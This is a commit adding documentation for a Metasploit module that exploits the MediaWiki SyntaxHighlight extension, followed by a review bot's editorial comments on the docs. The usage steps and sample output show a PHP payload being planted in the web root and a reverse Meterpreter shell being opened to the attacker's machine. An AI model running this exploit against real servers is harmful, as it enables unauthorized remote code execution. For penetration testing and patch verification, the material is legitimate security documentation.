Added docs for mediawiki_syntaxhighlight.rb

bug/bundler_fix
Yorick Koster 2017-04-29 16:14:25 +02:00 committed by GitHub
parent f9e7715adb
commit 0eb79e8c8c
1 changed files with 30 additions and 0 deletions

@ -0,0 +1,30 @@
## Vulnerable Application
Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. This issue was supposed to be fixed in MediaWiki version 1.28.1 and version 1.27.2. It appears that the fix was pushed to the git repository, but for some reason it was not included in the release packages.
## Verification Steps
1. `use exploit/multi/http/mediawiki_syntaxhighlight`
2. `set RHOST <ip target site>`
3. `set TARGETURI <MediaWiki path>`
4. `set UPLOADPATH <writable path in web root>`
5. optionally set `RPORT`, `SSL`, and `VHOST`
6. `exploit`
7. **Verify** a new Meterpreter session is started
## Sample Output
```
msf > use exploit/multi/http/mediawiki_syntaxhighlight
msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137
RHOST => 192.168.146.137
msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki
TARGETURI => /mediawiki
msf exploit(mediawiki_syntaxhighlight) > exploit
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php
[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php
[*] Sending stage (33986 bytes) to 192.168.146.137
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200
```
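
Review bot: Step 4 of Verification Steps lists `set UPLOADPATH <writable path in web root>` as a required step, but the Sample Output never sets it and still reports `Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php`, so the option appears to have a default. Either move `UPLOADPATH` into step 5 with the other optional settings and state its default, or add the `set UPLOADPATH` line to the sample so the two sections agree. A short Options section describing `UPLOADPATH` (relative to what, and what permissions it needs) would also help. In Vulnerable Application, the text says the fix "was supposed to be" in 1.28.1 and 1.27.2 but was missing from the release packages. As written, a reader cannot tell which packaged versions are actually affected, so it would be worth stating which release packages were tested and linking the upstream fix or advisory. As a style point, the `##` headings follow the preceding text with no blank line, which some Markdown renderers will not treat as headings.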